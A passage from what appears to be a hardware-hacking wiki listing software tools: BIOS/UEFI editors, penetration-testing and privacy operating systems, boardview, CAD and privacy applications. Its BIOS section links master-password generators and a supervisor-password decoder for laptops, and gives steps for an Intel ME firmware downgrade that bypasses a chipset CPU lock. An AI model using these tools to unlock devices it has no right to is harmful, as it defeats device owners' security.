::*[https://www.nirsoft.net/utils/cports.html cports] - is network monitoring software that displays the list of all currently opened TCP/IP and UDP ports on your local Windows computer.

::*[https://www.netresec.com/?page=NetworkMinerSourceCode NetworkMiner] - is an open source network forensics tool that extracts artifacts, such as files, images, emails and passwords, from captured network traffic in PCAP files.

::*[https://linux.die.net/man/8/netstat netstat] - is a Linux CLI tool to print network connections, routing tables, interface statistics, masquerade connections, and multicast memberships.

----

====BIOS (basic input/output system) firmware modifying software====
Unified Extensible Firmware Interface (UEFI) & legacy computer BIOS (basic input/output system) firmware modifying software. 

=====UEFI=====
::*[https://github.com/LongSoft/UEFITool UEFITool / UEFIExtract / UEFIFind] - is a UEFI firmware image viewer and editor.
::*[https://github.com/LongSoft/IFRExtractor-RS IFRExtractor-RS] - is a Rust utility to extract UEFI IFR (Internal Form Representation) data found in a binary file into human-readable text.
::*[https://github.com/theopolis/uefi-firmware-parser uefi-firmware-parser] - is a cross-platform open source application written in Python. Very tinker-friendly. Can be used in scripts to automate firmware patching.
::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_5.01_x64.exe AMIBCP_5.01_x64] - AMI BIOS Configuration Program (AMIBCP) is a powerful customization utility that enables OEMs/ODMs to customize the Aptio® ROM image without intervening on the source code. [https://www.virustotal.com/gui/file/58f822028c24bb452e4c0af60118b3db2a492d91dbf477960ac4f595cfded91b VT link]
::*[https://github.com/tylernguyen/razer15-hackintosh/blob/master/tools/AMIBCP64/AMIBCP64.exe AMIBCP 5.01.0014 x64] [https://www.virustotal.com/gui/file/58f822028c24bb452e4c0af60118b3db2a492d91dbf477960ac4f595cfded91b/details VT link]
::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_5.02.0023.exe AMIBCP_5.02.0023] [https://www.virustotal.com/gui/file/38f7c54098af1544ddba6324e6d1fea6d1462f422ba021f309ad4445dacd0467 VT link]
::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_5.02.0031.exe AMIBCP_5.02.0031] [https://www.virustotal.com/gui/file/c7ade67fe0e8f4c22f73ce3168ff6e718086f1eda83cce4c065b4fe49bd5ad99 VT link]
::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP%205.02.0034.exe AMIBCP 5.02.0034] [https://www.virustotal.com/gui/file/7fe28fb8a7419c95fba428891e5b3914d9e2b365a5a8932da74db52a1c1dabd8 VT link]
::*[https://github.com/datasone/grub-mod-setup_var grub-mod-setup_var] - a modified grub allowing tweaking hidden BIOS settings. Does not work with newer (2012 & >>) InsydeH2o because of SMM protection or variable locking.
::*[https://github.com/JamesAmiTw/ru-uefi RU.EFI] - is a UEFI app that allows users to examine and modify UEFI variables within a system's BIOS while the system is running. It's essentially a tool for interacting with and altering firmware settings, and is often used for tasks like unlocking hidden BIOS settings or debugging firmware-related issues. Crashes on newer (2012 & >>) InsydeH2o upon loading from EFI shell possibly because of violating BIOS runtime security policies.

=====BIOS (legacy)=====
::*[https://forums.mydigitallife.net/threads/tool-to-insert-replace-slic-in-phoenix-insyde-dell-efi-bioses.13194 PhoenixTool] - is a Windows-only freeware GUI application written in C#. Used mostly for SLIC-related modifications, but it not limited to this task. Requires Microsoft .NET 3.5 to work properly. Supports unpacking firmware images from various vendor-specific formats like encrypted HP update files and Dell installers.
:::'''AMI'''
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_2.25.zip AMIBCP_2.25] [https://www.virustotal.com/gui/file/71050f3db40cc6c0a623d66c8eeb05d0a0818226fd11ed787452f4f540d45204 VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_2.43.zip AMIBCP_2.43] [https://www.virustotal.com/gui/file/efa10cfe5f78c16982abf458eb50a4fde152631ad3b77838bd2013a763045ced VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_3.13.exe AMIBCP_3.13] [https://www.virustotal.com/gui/file/e0a5b1059f04813e72c6d4fa639d32567002fdd86321895b5987224a4518896e VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_3.37.exe AMIBCP_3.37] [https://www.virustotal.com/gui/file/1174e177b28fb7ecbac6c5043a9e8d78ff4756f657ea72369c5fb6b43b1f2623 VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_3.46.exe AMIBCP_3.46] [https://www.virustotal.com/gui/file/84bd5b151286d4181ef26284d96ca49074e18574b8454c51cb0b34013ee5d073 VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_3.47.exe AMIBCP_3.47] [https://www.virustotal.com/gui/file/20d93c6f868d4638676b7cde2c66c5589433c1480250aa0d774c4feef3337507 VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_3.51.exe AMIBCP_3.51] [https://www.virustotal.com/gui/file/0d630b4b9c34d6c7132249a1a7bc3de33b39779fc90d9a367272cf57b4621aed VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_4.53.exe AMIBCP_4.53] [https://www.virustotal.com/gui/file/3f90e402dab9f64cbc4514e18bc2625ec7672da806cd9e0ef2e803b0ce104a01 VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_4.55.exe AMIBCP_4.55] [https://www.virustotal.com/gui/file/451ad821a66e9ea89ee0544ce53cfab887dc0bb662a2de95f0e1aa1663dc6e06 VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_2.22.1.exe MMTOOL_2.22.1] - MMtool stands for Module Management Tool. As one of AMI's BIOS/UEFI utilities, MMTool allows users to manage firmware file modules within the Aptio ROM image. [https://www.virustotal.com/gui/file/cf49f1e742f5cce68152f3c17df29e5c9aa7fb557c432402199159ffda44e007 VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.12.exe MMTOOL_3.12] [https://www.virustotal.com/gui/file/78c3ca427878be5b07058f422914027462d3ac740b0de247169cc0aee4195e3b VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOl_3.19.exe MMTOOl_3.19] [https://www.virustotal.com/gui/file/b4b30c6ff911f18d3383b094628f59aa5ec3b109acd12aaef391acf9720e52af VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.19_Mod_21FiX.exe MMTOOL_3.19_Mod_21FiX] [https://www.virustotal.com/gui/file/66e2717fcac67b073d24916c74bc8d8dd7932b188d20b8b635b511e6195d5855 VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.22.EXE MMTOOL_3.22] [https://www.virustotal.com/gui/file/5616a62d2b50a53490bb705b769ed86bf4b49799663a814fcd1284ebc0bdc62f VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.22_1B_21Fix-BKMOD.EXE MMTOOL_3.22_1B_21Fix-BKMOD] [https://www.virustotal.com/gui/file/5616a62d2b50a53490bb705b769ed86bf4b49799663a814fcd1284ebc0bdc62f VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.22_CN_BKMod.exe MMTOOL_3.22_CN_BKMod] [https://www.virustotal.com/gui/file/f467d75962278a4e01d646cdf8008136912d8a1ddd588c45e2fcee9d7cd17140 VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.23_CN_BKMod.exe MMTOOL_3.23_CN_BKMod] [https://www.virustotal.com/gui/file/9bf846d023312c889069b03f5ab7157e270fc67c5d295e745d0a5f27d12a71de VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.26.exe MMTOOL_3.26] [https://www.virustotal.com/gui/file/c5a64ea7ce2bea8556fa81e0069adbba793181bfaa76f59f4f472f0a471bac98 VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_4.50.0.23.exe MMTOOL_4.50.0.23][https://www.virustotal.com/gui/file/7d0377a72e67e5a71400361416452440826832aeb2c9bebaa578e8af962eaafd VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_5.0.07.exe MMTOOL_5.0.07] [https://www.virustotal.com/gui/file/28049163fd1e3423c42b229a5f6ed877f14e7caf3b794bf7efb970b375e6ff41 VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_5.02.0024.exe MMTOOL_5.02.0024] [https://www.virustotal.com/gui/file/bbc3e75905997ddc05c523e57a72e49bbfcaf84dca64e460f10f8553b7fda9ee VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_5.02.0025.exe MMTOOL_5.02.0025] [https://www.virustotal.com/gui/file/5d05d0bbea720d4b73dc66db55031c2659458696b9f143df3b7e2f43040289cc VT link]
:::'''Award'''
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/tree/main/Award_Bios_Editor Award Bios Editor] - is a editor for Award bios.
:::'''InsydeH2O'''
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/Insyde/H2OEZE/x86/H2OEZE_x86_WIN_100.00.02.13.zip H2OEZE_x86_WIN_100.00.02.13] - H2OEZE™: Easy BIOS Editor that helps edit binaries in the BIOS, including Option ROMs, driver binaries, logos, and Setup values. [https://www.virustotal.com/gui/file/9660f1bf9436b258ec5ad857a94fbd0ec1f8fbff8ab22ca1dfcfb5ebbdcedf08 VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/Insyde/H2OEZE/x86/H2OEZE_x86_WIN_100.00.03.04.zip H2OEZE_x86_WIN_100.00.03.04] [https://www.virustotal.com/gui/file/2a1005803da854693502093445906eb2cccb24947d6828bc1533ba3603c73b0a VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/Insyde/H2OEZE/x64/H2OEZE_x64_WIN_100.00.03.04.rar H2OEZE_x64_WIN_100.00.03.04] [https://www.virustotal.com/gui/file/20d2d0336d30afd0b1961eb42dc061ce66a6fcfbfba1530e7abd9be883dcb45c VT link]
:::'''Phoenix'''
:::*[[Media:PhoenixBiosEditor2.2.13.zip]] (pw: recessim.com [https://www.virustotal.com/gui/file/3abf75ea7386f3dc24156bf6175a940867b8c742246cb8bf257fe5fc0b1cf9b5 VT link]) - is a software tool used to view and modify the settings and structure of Phoenix BIOS firmware images dating from between 2004 and 2008.

:Download all* the above tools in one archive, [https://github.com/direstraits96/BIOS-MOD-TOOLS/archive/refs/heads/main.zip click here]. [https://www.virustotal.com/gui/file/d8a75883ca8d292adcf40e5ed88584579b1c0c69f6ad5837fc56747233c56f9c VT link]

:::'''Tool collections'''
:::*[http://xdel.ru/downloads/bios-mods.com-tools/ bios-mods.com tools (2016)] - is a collection of bios modifying and flashing tools.

:::'''Microcode Extraction Tool'''
:::*[https://github.com/platomav/MCExtractor MCExtractor] - is a tool which parses Intel, AMD, VIA and Freescale processor microcode binaries. It can be used by end-users who are looking for all relevant microcode information such as CPUID, Platform, Version, Date, Release, Size, Checksum etc.

:Bios password resetting
::*[https://archive.org/details/hp-bios-reset-mazzif HP BIOS Password Reset by MAZZIF] [https://www.virustotal.com/gui/file/9ddd094edc286f2cb8d63158d226986d9a0c184ca450580dfaf9754005df9d41 VT link] - A live USB tool made by Mazzif to reset older HP Probook and Elitebook BIOS passwords.

::*[[Media:Fujitsu bios unlock.zip|pwgen-fsi-6x4dec.py]] [https://www.virustotal.com/gui/file/3a43ba7c88f1f10576728ea291b3097c048f842eee30dda3121280c049c61b8a VT link] pwgen-fsi-6x4dec.py - is a python command-line utility for generating master unlock password for older Fujitsu notebooks. Tested on: E557, FH570, Q616, U728, T731, E734, U745, S752, E756

::*[https://github.com/dogbert/bios-pwgen/tree/master bios-pwgen] - BIOS Master Password Generators for older laptops [http://dogber1.blogspot.com/2009/05/table-of-reverse-engineered-bios.html blogpost] (dell, asus, fsi6x4, fxi-hex hpmini, insyde, samsung, sony-4x4, sony-serial).

::*[[Media:AMITSEDecrypt.zip]] [https://www.virustotal.com/gui/file/2b03ef2292863bd94dc6ce0f10412f27ec5abf95f1e3aca2d34dd3712fd45d12 VT link] - AMI supervisor password decoder called "AMITSEDecrypt" to decode them with the XOR key. Works on older AMI firmware images is able to recover supervisor password if set.

::*[https://bios-pw.org/ BIOS Master Password Generator (bios-pw.org)] - is a website that provides default or master BIOS unlock passwords for various laptop brands based on the system-generated hash or code displayed after too many failed BIOS password attempts.

=====HM70 PCH chipset Bypass Unsupported CPU=====
:Machine shuts down after 30 minutes if a '''"unsupported CPU"''' (Intel Core i3, i5 or i7) is installed in a notebook using the HM70 chipset. 
:The HM70 is aimed at entry-level laptops and budget-conscious consumers, and therefore is locked to [https://www.cpu-upgrade.com/mb-Intel_(chipsets)/HM70_Express.html support only dual core Pentium and Celeron CPUs..] 
:Intel has restricted this chipset in the firmware to shut down after 30 minutes if users attempt to upgrade their entry-level laptops.
::[[File:Hm70.png|none|thumb|200px|Intel HM70 PCH chipset. CPUs supported: Intel Pentium & Intel Celerons. [https://www.intel.com/content/www/us/en/products/sku/67419/mobile-intel-hm70-express-chipset/compatible.html Intel source]]]

======Intel Management Engine Firmware Downgrade Attack======

::First analyze the firmware after you have made a back-up. Make note of the Intel ME version.
::Then download the Intel ME version just below the firmware version you try to downgrade.
::Fire up your hex editor search in your bios blob for '''"0x24, 0x46, 0x50, 0x54, 0x0F, 0x00, 0x00, 0x00, 0x20"''' Intel ME 1.5M blob will start ascii text '''"$FPT"'''.
::Replace that entire section with the new downgraded Intel ME 1.5m blob. Before flashing make sure Me Analyzer recognises the change. Flash the modification and test it.
::If you don't see the ME version change with Me Analyzer first try to make note of the offset the Intel ME blob is at and then run it through me_cleaner before injecting a older one.

::This downgrade attack successfully bypassed the 30 minute shutdown restriction timer.

:'''Required tools''':
::*[[Software_Tools#Hex_Editors|Hex Editor.]]
::*[https://github.com/platomav/MEAnalyzer Me Analyzer] - Intel Engine & Graphics Firmware Analysis Tool.
::*[https://github.com/corna/me_cleaner me_cleaner] - Tool for partial deblobbing of Intel ME/TXE firmware images.
::*[https://winraid.level1techs.com/t/intel-conv-sec-management-engine-drivers-firmware-and-tools-2-15/30719 Intel (Converged Security) Management Engine: Drivers, Firmware and Tools for (CS)ME 2-15] - Useful resource.
::*[https://mega.nz/folder/2Q0klQpA#6o04nlV_4xqfx76tjvgi4g (CS)ME Firmware Archive.]

----

====Operating Systems====
Below are categories of operating systems used for various purposes, including binary reverse engineering, local software analysis, and wireless penetration testing with SDR for RF signal analysis.
=====Mostly X86-64=====
======Penetration Testing & Digital Forensics======
*[https://www.kali.org/ Kali Linux] - is an open-source, Debian-based Linux distribution geared towards various information security tasks, such as Penetration Testing, Security Research, Computer Forensics and Reverse Engineering.

*[https://www.backbox.org/ BlackBox] is more than an operating system, it is a Free Open Source Community Project with the aim of promoting the culture of security in IT environment and give its contribution to make it better and safer.

*[https://blackarch.org/ BlackArch] - is an Arch Linux-based penetration testing distribution for penetration testers and security researchers.

*[https://www.parrotsec.org/ Parrot Security] - is based on top of Debian, the most advanced and recognized universal operating system that can run anywhere.

*[https://labs.fedoraproject.org/security/ Fedora Security Spin] - is a live media based on Fedora to provide a safe test environment for working on security auditing, forensics and penetration testing, coupled with all the Fedora Security features and tools.

*[https://www.caine-live.net/ CAINE] - CAINE (Computer Aided INvestigative Environment) is an Italian GNU/Linux live distribution created as a Digital Forensics project.

*[https://github.com/dracos-linux Dracos Linux] - is the Linux operating system from Indonesia, open source is built based on Debian live project under the protection of the GNU General Public License v3.0. This operating system is one variant of Linux distributions, which is used to perform security testing (penetration testing). Dracos linux in Arm by hundreds hydraulic pentest, forensics and reverse engineering.

*[https://www.pentoo.ch/ Pentoo] - is a Live CD and Live USB designed for penetration testing and security assessment. Based off Gentoo Linux, Pentoo is provided both as 32 and 64 bit installable livecd.

======RF Signals Analysis OS [RISC SBC & X86-64]======
*[https://cemaxecuter.com/ DragonOS] - Out of the box OS for SDRs. Supports Raspberry Pi and x86-64.

======Privacy Operating System======
*[https://tails.net/ Tails] - is a portable operating system that protects against surveillance and censorship.
*[https://www.qubes-os.org/ Qubes OS] - is a security-focused operating system that uses virtualization to isolate applications and tasks into separate compartments (called qubes), protecting the system even if one part gets compromised.
*[https://www.whonix.org/ Whonix] is a privacy-focused Linux distribution that routes all internet traffic through the Tor network using a two-part system of an isolated gateway and a workstation to provide strong anonymity and security.

======Windows 10 IoT LTSC======
*[https://rentry.co/LTSC LTSC IoT Windows 10 debloat & setup guide] [[Media:LTSC.pdf]] - Useful when you want a clean debloated Windows 10 virtual machine. The IoT LTSC channel receives security updates until Jan 13, 2032.

*[https://rentry.org/fwt2 fwt2] [[Media:Fwt2.pdf]] - Read the /fwt/ paste for a more general overview of Windows.

======Previous Windows versions======
*[https://hackandpwn.com/windows-7-esu-patching/ Windows 7 ESU Patching] - Information about the minimum set of updates needed for Windows 7 latest ESU hotfixes/patches.

=====Embedded Devices [Network equipment]=====

*[https://openwrt.org/ OpenWrt] - is an open-source project for embedded operating systems based on Linux, primarily used on embedded devices to route network traffic.

*[https://dd-wrt.com/ DD-WRT] - is a Linux based alternative OpenSource firmware suitable for a great variety of WLAN routers and embedded systems. The main emphasis lies on providing the easiest possible handling while at the same time supporting a great number of functionalities within the framework of the respective hardware platform used.

*[https://www.pfsense.org/ pfSense] - is a free and open-source operating system for firewalls and routers, primarily based on FreeBSD, that provides a comprehensive network security solution.

*[https://opnsense.org/ OPNsense] - is an open-source firewall and routing platform built on FreeBSD. It's designed to be user-friendly and easy to configure, offering a wide range of features found in commercial firewalls, plus many more.

=====Smartphones [Android "de-google"]=====

*[https://lineageos.org/ LineageOS] - is a free and open-source operating system for Android devices, based on the Android mobile platform.

*[https://grapheneos.org/ GrapheneOS] - is a privacy and security focused mobile OS with Android app compatibility developed as a non-profit open source project.

*[https://sailfishos.org/ Sailfish OS] - is a secure mobile operating system optimized to run on smartphones and tablets, and also easily adaptable to all kinds of embedded devices and use cases.

*[https://calyxos.org/ CalyxOS] - is a privacy-focused, "de-googled" Android-based operating system created by the Calyx Institute. It aims to defend online privacy, security, and accessibility by removing Google services and replacing them with free and open-source alternatives.

*[https://crdroid.net/ crDroid] - is a highly customized, free Android ROM, based on LineageOS, designed for gaming and customization.

*[https://www.ubuntu-touch.io/ Ubuntu Touch] - is a mobile operating system developed by the UBports community, based on the GNU/Linux operating system. It's a mobile version of Ubuntu, designed for touch-screen devices like smartphones and tablets, with a desktop-like experience.

----

====Tools for opening CAD or Boardview files====
'''Description''': Boardview is a type of file containing information about printed circuit boards, their components, used signals, test points and more. These files may have following extensions: .asc, .bdv, .brd, .bv, .cad, .cst, .gr, .f2b, .fz, .tvw and others.

*[https://pldaniels.com/flexbv5/ FlexBV] - Advanced FlexBV boardview software integrates your boardview files with PDF schematics to substantially ease the process of tracking down faults and understanding damaged boards

*[https://openboardview.org/ OpenBoardView] - is a Open Source Linux SDL/ImGui edition software for viewing .brd files, intended as a drop-in replacement for the "Test_Link" software and "Landrex".

*[https://www.cadence.com/ko_KR/home/tools/allegro-downloads-start.html Allegro®/OrCAD® FREE Physical Viewer] - is a free download that allows you to view and plot databases from Allegro PCB Editor, OrCAD PCB Editor, Allegro Package Designer, and Allegro PCB SI technology.

*[http://boardviewer.net/ BoardViewer] - is software intended for viewing various boardview file types like .tvw files and much more supported formats.

*CADview - simple old tool for viewing CAD files of PCB's (Windows). [[Media:CAD View.zip]] [https://www.virustotal.com/gui/file/9a64621ff34d8d674ba6580538908f4ea170fee9cc1cb700485bd41e3a3a42df VT link]

For resources to open in your favorite boardview program visit
[[Literature#Datasheets.2C_boardviews.2C_schematics.2C_manuals|Literature -> Datasheets boardviews & schematics]]

----

====Custom PCB Development Software====

=====Definition and Purpose=====
::'''Computer-Aided Design (CAD)''' refers to software that enables users to create, modify, analyze, or optimize designs in various fields such as architecture, mechanical engineering, and manufacturing. CAD is predominantly used for designing physical structures and components. It allows designers to visualize objects in two-dimensional (2D) or three-dimensional (3D) formats, facilitating precise planning and adjustments before production begins.

::In contrast, '''Electronic Design Automation (EDA)''' encompasses a suite of software tools specifically tailored for the design of electronic systems. EDA is crucial in industries like semiconductor manufacturing and printed ::circuit board (PCB) design. It focuses on automating the processes involved in designing electronic circuits at various levels—from high-level architectural descriptions down to detailed layouts.

::'''Integration Between CAD and EDA'''
::While CAD focuses on physical structures, EDA deals with electronic components. However, as products increasingly integrate both mechanical structures and electronic systems—such as IoT devices—the need for collaboration between CAD and EDA has grown. This integration allows designers to embed electronic circuits within mechanical models seamlessly.

=====Electronics Design Automation [[Wikipedia:Electronic_design_automation|(EDA)]] Suite for Developing Custom PCB's=====

*[https://www.kicad.org/ KiCAD] - is a free CAD suite for electronic design automation (EDA). It facilitates the design and simulation of electronic hardware. It features an integrated environment for schematic capture, PCB layout, manufacturing file viewing, ngspice-provided SPICE simulation, and engineering calculation.

*[https://easyeda.com/ EasyEDA] - EasyEDA is a web-based EDA tool suite that enables hardware engineers to design, simulate, share - publicly and privately - and discuss schematics, simulations and printed circuit boards. It can also be used [https://docs.easyeda.com/en/FAQ/Client/index.html offline].

*[https://fritzing.org/ Fritzing] - is an open-source hardware initiative that makes electronics accessible as a creative material for anyone.

*[https://librepcb.org/ LibrePCB] - is a free, cross-platform, easy-to-use electronic design automation suite to draw schematics and design printed circuit boards – for makers, students and professionals, from beginners to experts.

*[http://www.geda-project.org/ gEDA Project] - The gEDA project has produced and continues working on a full GPL'd suite and toolkit of Electronic Design Automation tools. These tools are used for electrical circuit design, schematic capture, simulation, prototyping, and production.

*[http://repo.hu/projects/pcb-rnd/ pcb-rnd] - is a free/open source, flexible, modular Printed Circuit Board editor. For design of professional and hobby boards. Is feature-rich and compatible. Has a long history, fast paced development, and big plansand is part of the coralEDA ecosystem.

=====Computer Aided Design [[Wikipedia:Computer-aided_design|(CAD)]] Mechanical Engineering=====

*[https://www.freecad.org/ FreeCAD] - is an open-source parametric 3D modeler made primarily to design real-life objects of any size. Parametric modeling allows you to easily modify your design by going back into your model history and changing its parameters.

*[https://openscad.org/ OpenSCAD] - is software for creating solid 3D CAD objects. It is free software and available for Linux/UNIX, MS Windows and Mac OS X.

*[https://brlcad.org/ BRL-CAD] - is a powerful open source cross-platform solid modeling system that includes interactive geometry editing, high-performance ray-tracing for rendering and geometric analysis, a system performance analysis benchmark suite, geometry libraries for application developers, and more than 30 years of active development.

*[https://solvespace.com/index.pl SolveSpace] - is a free (GPLv3) parametric 3d CAD tool. Modeling 3d parts, modeling 2d parts, 3d-printed parts, preparing CAM data, mechanism design, plane and solid geometry.

----
====Other software====

=====Display Driver Utilities (Windows)=====

*[https://github.com/lostindark/DriverStoreExplorer Driver Store Explorer (RAPR)] - is a tool used to manage the Windows driver store, a repository of driver packages that Windows uses to install and update hardware drivers. It helps users list, add, install, delete, and export driver packages, especially those from third-party vendors.

*[https://github.com/Wagnard/display-drivers-uninstaller DDU] - is a driver removal utility that can help you completely uninstall AMD/NVIDIA/Intel graphics card drivers and packages from your system, without leaving leftovers behind (including registry keys, folders and files, and driver store).

*[https://www.techpowerup.com/nvcleanstall/ NVCleanstall] - is a free utility from TechPowerUp that allows you to customize your NVIDIA GeForce driver installation. It enables you to remove unnecessary components and install only the drivers you need, potentially optimizing your system performance and minimizing "bloatware".

*[https://github.com/GSDragoon/RadeonSoftwareSlimmer Radeon Software Slimmer] - is a utility to trim down the bloat with Radeon Software for AMD GPUs on Microsoft Windows.

*[https://forums.guru3d.com/threads/nvslimmer-nvidia-driver-slimming-utility.423072/ NVSlimmer] - is a third-party utility created by uKER and available on guru3d.com that allows users to remove unwanted components from NVIDIA graphics driver installations, effectively "trimming" down the install base. It's not an official Nvidia utility.

=====Host Based Firewall [Windows FOSS]=====
*[https://github.com/tnodir/fort Fort Firewall] - is a very practical firewall that allows you to manage your privacy and security in Windows simply and flexibly. This open-source tool is a perfect alternative to the standard Windows firewall, giving you a lot of customizable features so you can work with your files and programs more comfortably.

=====Web Browsing=====
*[https://www.mozilla.org/firefox/ Mozilla Firefox] - is a free, open source web browser developed by the Mozilla Foundation and Mozilla Corporation in 2004. The Firefox web browser can be used with Windows, Mac and Linux operating systems, as well as Android and iOS mobile devices.

::Extensions & Configurations
:::*[https://github.com/hackademix/noscript NoScript] - The popular NoScript Security Suite browser extension.
:::*[https://github.com/ChrisAntaki/disable-webrtc-firefox WebRTC block] - WebRTC leaks your actual IP addresses from behind your VPN, by default. With this extension you can disable it.
:::*[https://github.com/arkenfox/user.js/ user.js] - Firefox privacy, security and anti-tracking: a comprehensive user.js template for configuration and hardening.
:::*[https://github.com/yokoffing/Betterfox Betterfox] - Firefox speed, privacy, and security: a user.js template for configuration. Your favorite browser, but better.
:::*[https://github.com/gorhill/uBlock uBlock] - Help users neutralize privacy-invading ads CPU and memory-efficient.
:::*[https://github.com/sereneblue/chameleon Chameleon] - is a WebExtension port of the popular Random Agent Spoofer. Spoofs a lot of client fingering techniques and adds security.
:::*[https://github.com/EFForg/privacybadger Privacy Badger] - is a browser extension that automatically learns to block invisible trackers. PB is made by the leading digital rights nonprofit EFF to stop companies from spying on you.

*[https://www.torproject.org/ Tor Browser] - [[Wikipedia:Tor_(network)|Tor]] (The Onion Router) is a network that anonymizes web traffic to provide truly private web browsing. The Tor Browser hides your IP address and browsing activity by redirecting web traffic through a series of different routers known as nodes.

*[https://guardianproject.info/apps/org.torproject.android/ Orbot for Android] - is a free proxy app that empowers other apps to use the internet more securely. Orbot uses Tor to encrypt your Internet traffic and then hides it by bouncing through a series of computers around the world. Tor is free software and an open network that helps you defend against a form of network surveillance that threatens personal freedom and privacy, confidential business activities.

======Public Networks======

*[https://www.torproject.org/ [[Wikipedia:Tor_(netwerk)|Tor]]] - is an open-source privacy network that enables anonymous web browsing. The worldwide Tor computer network uses secure, encrypted protocols to ensure that users' online privacy is protected.

*[https://geti2p.net/ The Invisible Internet Project [[Wikipedia:I2P|(I2P)]]] - is a fully encrypted private network layer. It protects your activity and location. Every day people use the network to connect with people without worry of being tracked or their data being collected.

*[https://www.freenet.de/ FreeNet] - is a peer-to-peer platform for censorship-resistant, anonymous communication. It uses a decentralized distributed data store to keep and deliver information, and has a suite of free software for publishing and communicating on the Web without fear of censorship.

*[https://zeronet.io/ ZeroNet] - Open, free and uncensorable websites, using Bitcoin cryptography and BitTorrent network · We believe in open, free, and uncensored network.

*[https://lokinet.org/ Lokinet] - is an onion-router that lets you access the internet anonymously. Built on LLARP, the fastest onion-routing protocol in the world.

*[https://nymtech.net/ Nym] - protect internet traffic by routing it through a decentralised mixnet that can be accessed anonymously using zk-nyms.

=====Email Clients / Email Encryption Standards=====
*[https://www.thunderbird.net/ Mozilla ThunderBird] - is a free, open-source, cross-platform application for managing email, news feeds, chat, and news groups. It is a local email application, meaning it installs and runs as a client on your device, being rather than browser or web-based. [https://support.mozilla.org/en-US/kb/openpgp-thunderbird-howto-and-faq FAQ How to implement OpenPGP in Thunderbird].

*[https://www.openpgp.org/ OpenPGP] - is the most widely used email encryption standard. It is defined by the OpenPGP Working Group of the Internet Engineering Task Force (IETF) as a Proposed Standard in RFC 4880. OpenPGP was originally derived from the PGP software, created by Phil Zimmermann.

*[https://www.gnupg.org/ GnuPG] - is a complete and free implementation of the OpenPGP standard as defined by RFC4880 (also known as PGP). GnuPG allows you to encrypt and sign your data and communications; it features a versatile key management system, along with access modules for all kinds of public key directories. GnuPG, also known as GPG, is a command line tool with features for easy integration with other applications.

*[https://wiki.gnome.org/Apps/Evolution Evolution] - is a personal information management application that provides integrated mail, calendaring and address book functionality. Check the Privacy Policy sub-page for a general information about user data usage. [https://riseup.net/en/email/clients/evolution FAQ How to implement OpenPGP in Evolution].

*[https://neomutt.org/ NeoMutt] - is a command line mail reader (or MUA ). It's a fork of Mutt with added features.

=====Chat Applications / Platforms=====
*[https://www.teamspeak.com/ TeamSpeak] - is a VoIP application for audio communication between users via a chat channel, similar to a video meeting. Cross-platform with military-grade security, lag-free performance, privacy and complete control.
*[https://github.com/RetroShare/RetroShare RetroShare] - is a Free and Open Source cross-platform, Friend-2-Friend and secure decentralised communication platform.
*[https://github.com/JFreegman/toxic Toxic] - is a Tox-based P2P messenger that provides end-to-end encrypted communications without the use of centralized servers. It supports text messaging, file sharing, 1-on-1 voice and video calls, private audio conferences, public and private text group chats.
*[https://www.jabber.org/ Jabber] - is a original messaging service based on [https://xmpp.org/ XMPP] and has been continuously offered for free since 1999.
::XMPP clients & extensions
:::*[https://xmpp.org/software/ XMPP client list] - is a list of XMPP clients composed by XMPP itself.
:::*[https://otr.cypherpunks.ca/ Off-the-Record Messaging (OTR) for XMPP] - is a cryptographic protocol that provides encryption for instant messaging conversations. OTR uses a combination of AES symmetric-key algorithm with 128 bits key length, the Diffie–Hellman key exchange with 1536 bits group size, and the SHA-1 hash function.
